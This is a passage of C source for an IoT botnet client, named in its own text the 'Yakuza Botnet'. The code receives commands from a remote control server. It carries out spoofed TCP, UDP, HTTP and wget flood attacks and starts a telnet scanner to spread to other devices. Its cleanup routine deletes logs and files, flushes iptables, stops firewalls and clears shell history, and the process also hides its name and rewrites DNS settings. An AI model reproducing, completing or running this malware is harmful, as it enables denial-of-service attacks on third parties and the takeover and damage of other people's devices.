1281. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1282. tcph->source = rand_cmwc();
1283. tcph->seq = rand_cmwc();
1284. tcph->ack_seq = 0;
1285. tcph->doff = 5;
1286. if(!strcmp(flags, "ALL")) {
1287. tcph->syn = 1;
1288. tcph->rst = 1;
1289. tcph->fin = 1;
1290. tcph->ack = 1;
1291. tcph->psh = 1;
1292. tcph->urg = 1;
1293. }
1294. if(!strcmp(flags, "USYN")) {
1295. tcph->syn = 1;
1296. tcph->urg = 1;
1297. }
1298. if(!strcmp(flags, "ASYN")) {
1299. tcph->syn = 1;
1300. tcph->ack = 1;
1301. }
1302. else {
1303. unsigned char *pch = strtok(flags, "-");
1304. while(pch) {
1305. if(!strcmp(pch, "SYN")) { tcph->syn = 1;
1306. } else if(!strcmp(pch, "RST")) { tcph->rst = 1;
1307. } else if(!strcmp(pch, "FIN")) { tcph->fin = 1;
1308. } else if(!strcmp(pch, "ACK")) { tcph->ack = 1;
1309. } else if(!strcmp(pch, "PSH")) { tcph->psh = 1;
1310. } else if(!strcmp(pch, "URG")) { tcph->urg = 1;
1311. } else {
1312. }
1313. pch = strtok(NULL, ",");
1314. }
1315. }
1316. tcph->window = rand_cmwc();
1317. tcph->check = 0;
1318. tcph->urg_ptr = 0;
1319. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1320. tcph->check = tcpcsum(iph, tcph);
1321. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1322. int end = time(NULL) + timeEnd;
1323. register unsigned int i = 0;
1324. while(1) {
1325. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1326. iph->saddr = htonl( getRandomIP(netmask) );
1327. iph->id = rand_cmwc();
1328. tcph->seq = rand_cmwc();
1329. tcph->source = rand_cmwc();
1330. tcph->check = 0;
1331. tcph->check = tcpcsum(iph, tcph);
1332. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1333. if(i == pollRegister) {
1334. if(time(NULL) > end) break;
1335. i = 0;
1336. continue;
1337. }
1338. i++;
1339. }
1340. }
1341. int socket_connect(char *host, in_port_t port) {
1342. struct hostent *hp;
1343. struct sockaddr_in addr;
1344. int on = 1, sock;
1345. if ((hp = gethostbyname(host)) == NULL) return 0;
1346. bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
1347. addr.sin_port = htons(port);
1348. addr.sin_family = AF_INET;
1349. sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
1350. setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
1351. if (sock == -1) return 0;
1352. if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1) return 0;
1353. return sock;
1354. }
1355.  
1356. void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
1357. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
1358. char request[512], buffer[1];
1359. for (i = 0; i < power; i++) {
1360. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, uagents[(rand() % 59)]);
1361. if (fork()) {
1362. while (end > time(NULL)) {
1363. socket = socket_connect(host, port);
1364. if (socket != 0) {
1365. write(socket, request, strlen(request));
1366. read(socket, buffer, 1);
1367. close(socket);
1368. }
1369. }
1370. exit(0);
1371. }
1372. }
1373. }
1374.  
1375. void SendHTTPHEX(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
1376. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
1377. char request[512], buffer[1], hex_payload[2048];
1378. sprintf(hex_payload, "\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA\x84\x8B\x87\x8F\x99\x8F\x98\x9C\x8F\x98\xEA");
1379. for (i = 0; i < power; i++) {
1380. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, hex_payload, host, uagents[(rand() % 59)]);
1381. if (fork()) {
1382. while (end > time(NULL)) {
1383. socket = socket_connect(host, port);
1384. if (socket != 0) {
1385. write(socket, request, strlen(request));
1386. read(socket, buffer, 1);
1387. close(socket);
1388. }
1389. }
1390. exit(0);
1391. }
1392. }
1393. }
1394.  
1395. void SendHTTPTXT(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
1396. int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
1397. char request[512], buffer[1], text_payload[2048];
1398. sprintf(text_payload, "Yakuza Botnet HTTP Flood In Progress. Fuck you.");
1399. for (i = 0; i < power; i++) {
1400. sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, text_payload, host, uagents[(rand() % 59)]);
1401. if (fork()) {
1402. while (end > time(NULL)) {
1403. socket = socket_connect(host, port);
1404. if (socket != 0) {
1405. write(socket, request, strlen(request));
1406. read(socket, buffer, 1);
1407. close(socket);
1408. }
1409. }
1410. exit(0);
1411. }
1412. }
1413. }
1414.  
1415. void SendWGET(unsigned char *url, int end_time)
1416. {
1417. int end = time(NULL) + end_time;
1418. FILE *pf;
1419. char command[80];
1420. sprintf(command, "wget --no-check-certificate -q -O /tmp/null ");
1421. strcat(command, url);
1422.  
1423. pf = popen(command,"r");
1424.  
1425. while(end > time(NULL))
1426. {
1427. system(command);
1428. }
1429.  
1430. }
1431.  
1432. void processCmd(int argc, unsigned char *argv[]) {
1433. if(!strcmp(argv[0], "ICMP"))
1434. {
1435. return;
1436. }
1437. if(!strcmp(argv[0], "TELNET"))
1438. {
1439. if(!strcmp(argv[1], "ON"))
1440. {
1441.  
1442. uint32_t parent;
1443. parent = fork();
1444. int ii = 0;
1445. int forks = sysconf( _SC_NPROCESSORS_ONLN );
1446. int fds = 999999;
1447. if(forks == 1) fds = 500;
1448. if(forks >= 2) fds = 1000;
1449. if (parent > 0)
1450. {
1451. scanPid = parent;
1452. return;
1453. }
1454. else if(parent == -1) return;
1455.  
1456. for (ii = 0; ii < forks; ii++)
1457. {
1458. srand((time(NULL) ^ getpid()) + getppid());
1459. init_rand(time(NULL) ^ getpid());
1460. TelnetScanner(100, fds);
1461. _exit(0);
1462. }
1463. }
1464. if(!strcmp(argv[1], "OFF"))
1465. {
1466. if(scanPid == 0) return;
1467.  
1468. kill(scanPid, 9);
1469. scanPid = 0;
1470. }
1471. if(!strcmp(argv[1], "FLOAD"))
1472. {
1473. int threads = atoi(argv[1]);
1474. int usec = atoi(argv[2]);
1475. if(!listFork())
1476. {
1477. sockprintf(mainCommSock, "FLoad Mode Activated");
1478. TelnetScanner(usec, threads);
1479. _exit(0);
1480. }
1481. return;
1482. }
1483. }
1484.  
1485. if (!strcmp(argv[0], "HTTP"))
1486. {
1487. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
1488. if (listFork()) return;
1489. SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
1490. exit(0);
1491. }
1492. ยด
1493. if (!strcmp(argv[0], "HTTPHEX"))
1494. {
1495. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
1496. if (listFork()) return;
1497. SendHTTPHEX(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
1498. exit(0);
1499. }
1500.  
1501. if (!strcmp(argv[0], "HTTPTXT"))
1502. {
1503. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
1504. if (listFork()) return;
1505. SendHTTPTXT(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
1506. exit(0);
1507. }
1508.  
1509. if(!strcmp(argv[0], "WGET"))
1510. {
1511. if(argc < 3 || atoi(argv[2]) < 1)
1512. {
1513. return;
1514. }
1515.  
1516. unsigned char *ip = argv[1];
1517. int time = atoi(argv[2]);
1518.  
1519. if(strstr(ip, ",") != NULL)
1520. {
1521. unsigned char *hi = strtok(ip, ",");
1522. while(hi != NULL)
1523. {
1524. if(!listFork())
1525. {
1526. int i = 0;
1527. while(i < 10){
1528. SendWGET(ip, time);
1529. i++;
1530. }
1531. close(mainCommSock);
1532. _exit(0);
1533. }
1534. hi = strtok(NULL, ",");
1535. }
1536. } else {
1537. if (listFork()) { return; }
1538. int i = 0;
1539. while(i < 10){
1540. SendWGET(ip, time);
1541. i++;
1542. }
1543. close(mainCommSock);
1544.  
1545. _exit(0);
1546. }
1547. }
1548. if(!strcmp(argv[0], "UDP"))
1549. {
1550. // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
1551. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
1552. {
1553. return;
1554. }
1555. unsigned char *ip = argv[1];
1556. int port = atoi(argv[2]);
1557. int time = atoi(argv[3]);
1558. int packetsize = atoi(argv[4]);
1559. int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
1560. int spoofed = 32;
1561. if(strstr(ip, ",") != NULL)
1562. {
1563. unsigned char *hi = strtok(ip, ",");
1564. while(hi != NULL)
1565. {
1566. if(!listFork())
1567. {
1568. SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
1569. _exit(0);
1570. }
1571. hi = strtok(NULL, ",");
1572. }
1573. } else {
1574. if (listFork())
1575. {
1576. return;
1577. }
1578. SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
1579. _exit(0);
1580. }
1581. }
1582. if(!strcmp(argv[0], "TCP"))
1583. {
1584. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1))
1585. {
1586. return;
1587. }
1588. unsigned char *ip = argv[1];
1589. int port = atoi(argv[2]);
1590. int time = atoi(argv[3]);
1591. unsigned char *flags = argv[4];
1592. int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
1593. int packetsize = argc > 5 ? atoi(argv[5]) : 0;
1594. int spoofed = 32;
1595. if(strstr(ip, ",") != NULL) {
1596. unsigned char *hi = strtok(ip, ",");
1597. while(hi != NULL) {
1598. if(!listFork()) {
1599. SendTCP(hi, port, time, flags, packetsize, pollinterval, spoofed);
1600. _exit(0);
1601. }
1602. hi = strtok(NULL, ",");
1603. }
1604. } else {
1605. if (listFork())
1606. {
1607. return;
1608. }
1609. SendTCP(ip, port, time, flags, packetsize, pollinterval, spoofed);
1610. _exit(0);
1611. }
1612. }
1613. if(!strcmp(argv[0], "STD"))
1614. {
1615. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1616. {
1617. return;
1618. }
1619. unsigned char *ip = argv[1];
1620. int port = atoi(argv[2]);
1621. int time = atoi(argv[3]);
1622. if(strstr(ip, ",") != NULL)
1623. {
1624. unsigned char *hi = strtok(ip, ",");
1625. while(hi != NULL)
1626. {
1627. if(!listFork())
1628. {
1629. SendSTD(hi, port, time);
1630. _exit(0);
1631. }
1632. hi = strtok(NULL, ",");
1633. }
1634. } else {
1635. if (listFork())
1636. {
1637. return;
1638. }
1639. SendSTD(ip, port, time);
1640. _exit(0);
1641. }
1642. }
1643. if(!strcmp(argv[0], "STOP"))
1644. {
1645. int killed = 0;
1646. unsigned long i;
1647. for (i = 0; i < numpids; i++)
1648. {
1649. if (pids[i] != 0 && pids[i] != getpid())
1650. {
1651. kill(pids[i], 9);
1652. killed++;
1653. }
1654. }
1655. if(killed > 0)
1656. {
1657. //
1658. } else {
1659. //
1660. }
1661. }
1662. }
1663. if(!strcmp(argv[0], "CLEAN"))
1664. {
1665. CleanDevice();
1666. sockprintf(mainCommSock, "[Cleaning] [%s:%s]", getBuild(), getEndianness());
1667. }
1668. }
1669. int initConnection() {
1670. unsigned char server[512];
1671. memset(server, 0, 512);
1672. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
1673. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
1674. else currentServer++;
1675. strcpy(server, commServer[currentServer]);
1676. int port = 23;
1677. if(strchr(server, ':') != NULL) {
1678. port = atoi(strchr(server, ':') + 1);
1679. *((unsigned char *)(strchr(server, ':'))) = 0x0;
1680. }
1681. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
1682. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
1683. return 0;
1684. }
1685. void UpdateNameSrvs() {
1686. uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
1687. if (access("/etc/resolv.conf", F_OK) != -1) {
1688. const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
1689. size_t resl = strlen(resd);
1690. write(fhandler, resd, resl);
1691. } else { return; }
1692. close(fhandler);
1693. }
1694. void CleanDevice() {
1695. system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
1696. system("rm -rf /var/log/wtmp");
1697. system("rm -rf /tmp/*");
1698. system("rm -rf /bin/netstat");
1699. system("iptables -F");
1700. system("pkill -9 busybox");
1701. system("pkill -9 perl");
1702. system("pkill -9 python");
1703. system("service iptables stop");
1704. system("/sbin/iptables -F; /sbin/iptables -X");
1705. system("service firewalld stop");
1706. system("rm -rf ~/.bash_history");
1707. system("history -c");
1708. }
1709. int getEndianness(void)
1710. {
1711. union
1712. {
1713. uint32_t vlu;
1714. uint8_t data[sizeof(uint32_t)];
1715. } nmb;
1716. nmb.data[0] = 0x00;
1717. nmb.data[1] = 0x01;
1718. nmb.data[2] = 0x02;
1719. nmb.data[3] = 0x03;
1720. switch (nmb.vlu)
1721. {
1722. case UINT32_C(0x00010203):
1723. return "BIG_ENDIAN";
1724. case UINT32_C(0x03020100):
1725. return "LITTLE_ENDIAN";
1726. case UINT32_C(0x02030001):
1727. return "BIG_ENDIAN_W";
1728. case UINT32_C(0x01000302):
1729. return "LITTLE_ENDIAN_W";
1730. default:
1731. return "UNKNOWN";
1732. }
1733. }
1734. int main(int argc, unsigned char *argv[]) {
1735. const char *lolsuckmekid = "";
1736. if(SERVER_LIST_SIZE <= 0) return 0;
1737. strncpy(argv[0],"",strlen(argv[0]));
1738. argv[0] = "";
1739. prctl(PR_SET_NAME, (unsigned long) lolsuckmekid, 0, 0, 0);
1740. srand(time(NULL) ^ getpid());
1741. init_rand(time(NULL) ^ getpid());
1742. pid_t pid1;
1743. pid_t pid2;
1744. int status;
1745. if (pid1 = fork()) {
1746. waitpid(pid1, &status, 0);
1747. exit(0);
1748. } else if (!pid1) {
1749. if (pid2 = fork()) {
1750. exit(0);
1751. } else if (!pid2) {
1752. } else {
1753. }
1754. } else {
1755. }
1756. chdir("/");
1757. setuid(0);
1758. seteuid(0);
1759. signal(SIGPIPE, SIG_IGN);
1760. while(1) {
1761. if(fork() == 0) {
1762. if(initConnection()) { sleep(5); continue; }
1763. sockprintf(mainCommSock, "[\e[96mBOT JOINED\e[97m] Arch: \e[96m%s \e[97m|| Type: %s]", getBuild(), getEndianness());
1764. UpdateNameSrvs();
1765. CleanDevice();
1766. char commBuf[4096];
1767. int got = 0;
1768. int i = 0;
1769. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1) {
1770. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
1771. unsigned int *newpids, on;
1772. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
1773. pids[on - 1] = 0;
1774. numpids--;
1775. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
1776. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
1777. free(pids);
1778. pids = newpids;
1779. }
1780. commBuf[got] = 0x00;
1781. trim(commBuf);
1782. if(strstr(commBuf, "ICMP") == commBuf) { // ICMP
1783. continue;
1784. }
1785. if(strstr(commBuf, "DUP") == commBuf) exit(0); // DUP
1786. unsigned char *message = commBuf;
1787. if(*message == '!') {
1788. unsigned char *nickMask = message + 1;
1789. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
1790. if(*nickMask == 0x00) continue;
1791. *(nickMask) = 0x00;
1792. nickMask = message + 1;
1793. message = message + strlen(nickMask) + 2;
1794. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
1795. unsigned char *command = message;
1796. while(*message != ' ' && *message != 0x00) message++;
1797. *message = 0x00;
1798. message++;
1799. unsigned char *tmpcommand = command;
1800. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
1801. unsigned char *params[10];
1802. int paramsCount = 1;
1803. unsigned char *pch = strtok(message, " ");
1804. params[0] = command;
1805. while(pch) {
1806. if(*pch != '\n') {
1807. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
1808. memset(params[paramsCount], 0, strlen(pch) + 1);
1809. strcpy(params[paramsCount], pch);
1810. paramsCount++;
1811. }
1812. pch = strtok(NULL, " ");
1813. }
1814. processCmd(paramsCount, params);
1815. if(paramsCount > 1) {
1816. int q = 1;
1817. for(q = 1; q < paramsCount; q++) {
1818. free(params[q]);
1819. }
1820. }
1821. }
1822. }
1823. }
1824. return 0;
1825. }
1826. }